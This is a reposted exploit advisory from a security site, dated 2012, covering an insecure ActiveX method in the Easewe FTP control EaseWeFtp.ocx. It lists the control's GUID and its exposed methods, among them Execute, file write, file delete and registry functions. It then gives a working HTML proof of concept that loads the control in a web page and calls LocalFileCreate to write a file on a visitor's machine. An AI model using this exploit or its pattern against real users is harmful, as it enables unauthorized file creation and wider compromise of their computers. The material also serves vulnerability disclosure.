首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Easewe FTP (EaseWeFtp.ocx) Insecure Method
来源:coolkaveh@rocketmail.com 作者:coolkaveh 发布时间:2012-08-09  
Exploit Title: Easewe FTP(EaseWeFtp.ocx) Insecure Method Exploit
Date: 2012-08-08
Author: coolkaveh
coolkaveh@rocketmail.com
Https://twitter.com/coolkaveh
Vendor Homepage:http://www.ftpocx.com/download.htm
Version: 4.6.02
Tested on: windows 7
Awesome Hesam BOF
==========================================================================
Class FtpLibrary
GUID: {31AE647D-11D1-4E6A-BE2D-90157640019A}
Number of Interfaces: 1
Default Interface: _FtpLibrary
RegKey Safe for Script: True
RegkeySafe for Init: True
KillBitSet: False
Interface _FtpLibrary : IDispatch
Default Interface: True
Members : 161
QueueAppend
QueueRemove
FormatSize
FormatFileSize
FormatTime
SFDFileName
SFDFilter
SFDInitialDir
SFDTitle
ShowBrowseFolderDialog
ShowSaveFileDialog
ServerName
Username
Password
Port
RemotePort
RemotePath
LocalPath
ReplaceIndex
ReplaceSetting
RenameRule
Percent
MKDInfo
MaxSpeed
Rcvbuf
Sndbuf
Timeout
RedoTimes
AllowType
DenyType
MaxSize
Title
Encoding
TranstatePath
KeepAliveCommand
KeepAliveInterval
ListCommand
ListSuffix
LangInfo
Info
SInfo
Lype
ExistFile
GetFileSize
GetFtpFileSize
GetFileInfo
GetFtpFileInfo
GetFileList
GetFtpDirectoryInfo
ExistDirectory
CreateDirectory
RemoveDirectory
DeleteFile
RenameFile
SendCommand
SetCurrentDirectory
GetFileName
GetFileNameWithoutExt
GetFileExtension
GetParentPath
LocalFileExists
LocalFolderExists
LocalFileCreate
LocalFolderCreate
LocalFileDelete
LocalFileRead
LocalFileWrite
GetLocalFileSize
GetLocalFolderSize
GetLocalFileCount
GetLocalFileDate
GetLocalFileList
ShowCmd
Execute
Explore
GetDriveNames
ProxyHost
ProxyPort
RegCreate
RegSetValue
RegSetValueEx
RegDelete
RegDeleteValue
RegDeleteValueEx
RegGetValue
RegGetValueEx
RegExists
============================================================================
<HTML>
Easewe FTP(EaseWeFtp.ocx) Insecure Method Exploit<br>
<br>
Description There is Insecure Method in (LocalFileCreate) fonction<br>
Found By : coolkaveh<br>

<title>Exploited By : coolkaveh </title>
<BODY>
<object id=cyber classid="clsid:{31AE647D-11D1-4E6A-BE2D-90157640019A}"></object>

<SCRIPT>

function Do_it()
{
     File = "kaveh.txt"
   cyber.LocalFileCreate(File)
}

</SCRIPT>
<input language=JavaScript onclick=Do_it() type=button value="Click here To Test"><br>
</body>
</HTML>

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·PHP IRC Bot pbot eval() Remote
·IBM Proventia Network Mail Sec
·Plixer Scrutinizer NetFlow and
·Oracle Business Transaction Ma
·NetDecision 4.2 TFTP Writable
·Oracle Business Transaction Ma
·Solaris 10 Patch Cluster Symli
·Ubisoft uplay 2.0.3 Active X C
·Tunnelblick Local Root Exploit
·Oracle AutoVue ActiveX Control
·Tunnelblick Local Root Exploit
·CoolPlayer+ Portable 2.19.2 Bu
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved